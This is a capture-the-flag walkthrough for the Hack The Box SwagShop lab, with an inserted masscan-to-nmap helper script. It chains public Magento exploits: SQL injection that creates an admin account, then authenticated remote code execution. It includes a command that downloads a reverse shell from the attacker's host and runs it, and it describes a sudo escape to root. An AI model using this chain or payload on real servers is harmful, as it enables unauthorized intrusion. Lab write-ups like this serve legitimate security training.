SwagShop: Hack The Box Walkthrough
source link: https://www.tuicool.com/articles/MVvmuiI
This post documents the complete walkthrough of SwagShop, a retired vulnerable VM created by ch4p, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Background
SwagShop is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports on the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.140 --rate=700
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-14 01:30:31 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.140
Discovered open port 80/tcp on 10.10.10.140
Nothing unusual. Let’s do one better with nmap, scanning only the discovered ports to establish the services behind them.
# nmap -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.140
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 88733EE53676A47FC354A61C32516E82
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Error 503: Service Unavailable
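The masscan-then-nmap two-step above is worth automating: masscan is fast but only tells you a port is open, and the port list has to be carried over into nmap's -p argument by hand. The script below is an added example (mine, not part of the original walkthrough): it parses masscan's "Discovered open port" lines into per-host TCP/UDP lists and emits the follow-up nmap command. The sample masscan output is constructed in the shape of the scan above; the duplicate line and the UDP port are invented to exercise de-duplication and the T:/U: port spec, and the function names are my own.

```python
import re
import shlex

# Constructed masscan output in the shape of the scan above; the duplicate
# and the UDP line are invented to exercise de-duplication and the U: path.
SAMPLE_MASSCAN = """\
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-14 01:30:31 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Discovered open port 22/tcp on 10.10.10.140
Discovered open port 80/tcp on 10.10.10.140
Discovered open port 80/tcp on 10.10.10.140
Discovered open port 161/udp on 10.10.10.140
"""

PORT_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<host>\S+)$"
)


def parse_masscan(output):
    """Map each host to sorted, de-duplicated TCP and UDP port lists."""
    hosts = {}
    for line in output.splitlines():
        m = PORT_RE.match(line.strip())
        if not m:
            continue                      # banner, status and option lines
        port = int(m.group("port"))
        if not 1 <= port <= 65535:
            continue                      # masscan never prints these, but be strict
        entry = hosts.setdefault(m.group("host"), {"tcp": set(), "udp": set()})
        entry[m.group("proto")].add(port)
    return {h: {p: sorted(v) for p, v in e.items()} for h, e in hosts.items()}


def nmap_command(host, ports, extra=("-n", "-v", "-Pn", "-A", "--reason")):
    """Build the follow-up nmap argv for one host.

    With only TCP ports the -p spec is a plain list (as in the walkthrough);
    if UDP ports were found, nmap needs -sU plus T:/U: prefixes in -p."""
    tcp = ",".join(map(str, ports["tcp"]))
    udp = ",".join(map(str, ports["udp"]))
    argv = ["nmap", *extra]
    if udp:
        argv += ["-sS", "-sU"]
        spec = ",".join(s for s in (f"T:{tcp}" if tcp else "", f"U:{udp}") if s)
    else:
        spec = tcp
    argv += ["-p" + spec, "-oN", f"nmap-{host}.txt", host]
    return argv


if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_MASSCAN).items():
        print(shlex.join(nmap_command(host, ports)))
```

Feed it the real masscan output (`masscan ... | tee masscan.txt`) and run the printed command; keep nmap's -oN so the service scan is preserved alongside the masscan log.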
The http service appears to be running an old version of Magento Community Edition (2014? Hello, it’s 2019!). Note the "Error 503: Service Unavailable" in nmap's http-title: the site answers intermittently, so a browser request may need a retry or two. Sometimes it pays to look at the copyright notice down in the footer. Here’s how it looks.
Scroll down.
Magento Community Edition 1.7.0.2
How do I know the version? From the release notes, basically. The directory structure can also be compared against a GitHub repository that mirrors the older Magento releases.
Magento Shoplift Vulnerability
This particular version is susceptible to the Magento Shoplift vulnerability, disclosed by Check Point in 2015. The public exploit chains an SQL injection that is reachable without authentication into an INSERT on the admin_user table, which is how it gets an administrator account for free.
Well, there’s a readily available exploit, EDB-ID 37977, for it. Running it creates an administrator account and grants access to the Admin Panel with the credentials forme:forme.
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
This next exploit, EDB-ID 37811, will allow us to execute remote commands once we are authenticated. There are just two minor modifications to make to the exploit script: the admin credentials and the installation date.
We got the credentials from the previous exploit. The installation date can be obtained from http://10.10.10.140/app/etc/local.xml, as the exploit's comments suggest. That file also holds the database credentials and the encryption key, so the fact that Apache serves it at all is a finding in its own right.
One last thing we need to know is the URL to the Admin Panel, which is http://10.10.10.140/index.php/admin. You can get a feel for the directory structure by navigating the site a bit, provided it doesn’t keep giving you 503s :laugh:
Low-Privilege Shell
I generate a reverse shell with msfvenom, host it with Python’s SimpleHTTPServer, and also set up a nc listener. We then execute the exploit like so, passing the Admin Panel URL and the command to run on the target.
# python rce.py http://10.10.10.140/index.php/admin "wget -O/tmp/rev http://10.10.14.11/rev; chmod +x /tmp/rev; /tmp/rev"
It’s customary to display /etc/passwd.
The file user.txt is in haris’s home directory and, disappointingly, it is world-readable.
Privilege Escalation
Notice the .sudo_as_admin_successful? Ubuntu’s sudo drops that file in a user’s home once a member of the admin group has run a command through sudo successfully, so haris has sudo rights of some sort. sudo -l lists exactly which commands.
There you go: a classic shell escape from the program haris is allowed to run as root, and we land in a root shell.
With that, getting root.txt is a breeze.
Afterthought
What a neat idea to promote the SwagShop!